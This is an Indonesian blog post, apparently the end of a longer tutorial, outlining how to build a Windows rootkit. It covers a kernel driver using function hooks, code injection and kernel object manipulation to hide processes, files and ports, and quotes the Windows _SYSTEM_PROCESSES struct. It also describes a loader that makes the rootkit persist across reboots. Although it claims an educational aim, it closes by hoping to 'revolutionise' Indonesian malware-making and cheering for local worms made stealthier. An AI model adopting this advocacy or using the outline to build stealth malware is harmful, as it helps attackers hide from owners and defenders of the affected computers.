Bahannya adalah kemampuan berbahsa C, C++, dan assembly (you are the master S'to!). Ngak pernah ada dalam sejarah, seorang hacker membuat rootkit dengan menggunakan BASIC (rasain para pecinta Basic)! Mengapa ngak ada yang memakai bahasa BASIC? Alasan pertama karena BASIC adalah bahasa yang paling lambat di dunia. Program BASIC yang menampilkan sebuah huruf ke layar tetap
membutuhkan minimal 10kB memory untuk .exe-nya sedangkan assembly atau C
dapat melakukan hal yang sama hanya dengan instruksi 100 byte dan dapat menghenat processor time sebanyak berberapa 10 pangkat minus -6 detik alias beberapa mikrodetik (penghematan yang amat sangat besar)! Alasan kedua adalah karena kernel sistem operasi terbuat dari bahasa C dan assembly, jadi untuk berhubungan dengan kernel windows/linux/unix, kita membutuhkan driver yang terbuat dari bahasa C.

Langkah kedua yang harus ditempuh adalah menrancang device driver, beserta fungsi kernel di dalamnya, yaitu antara lain windows function hooks, code injection, dan Direct Kernel Object Manipulation. Windows function hooks berguna untuk memanipulasi kernel yang ada di dalam windows agar sesuai dengan kemauan si hacker. Contohnya menyembunyikan process, files, directories, registry, system HANDLES, dan services serta port komunikasi. Berikut adalah cuplikan code OS Windows untuk tipe data _SYTEM_PROCESSES. Sang hacker dapat mengubah NextEntryData untuk menyembunyikan process dari record processes yang dikehendakinya sendiri.

typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters; // Windows 2000 only
SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;

Langkah terakhir adalah membangun aplikasi .exe. Exe ini berguna untuk load driver. Load driver berguna untuk meload code-code yang ada di dalam driver (.sys) ke dalam kernel OS. Selain load driver, exe berguna untuk mengatur Winsock interface, mengatur process booting agar rootkit tahan boot system, dan terakhir unload driver ketika rootkit selesai
digunakan maupun ketika komputer di shutdown.

Semua langkah tersebut mencakup seluruh process pembuatan rootkit secara umum. Penulis sengaja menyederhanakannya agar pembaca yang kurang paham tentang teknik coding dapat belajar untuk mengerti tentang rootkit dan bahayanya bagi sistem komputer. Sekarang Anda mengetahui bahwa hanya dengan rootkit, seluruh kekuatan OS ada di dalam genggaman ANDA! Bayangkan teknologi rootkit dipakai dalam semua worm di Indonesia,
betapa mengerikan worm lokal jadinya (worm awal brontok: si tukang restart -> brontok + rootkit berubah menjadi brontok di tukang nyusup.
Mudah-mudahan tulisan saya ini dapat merevolusi teknik pembuatan malware di Indonesia. HIDUP MALWARE INDONESIA!



Read more...
Template by - Abdul Munir | Daya Earth Blogger Template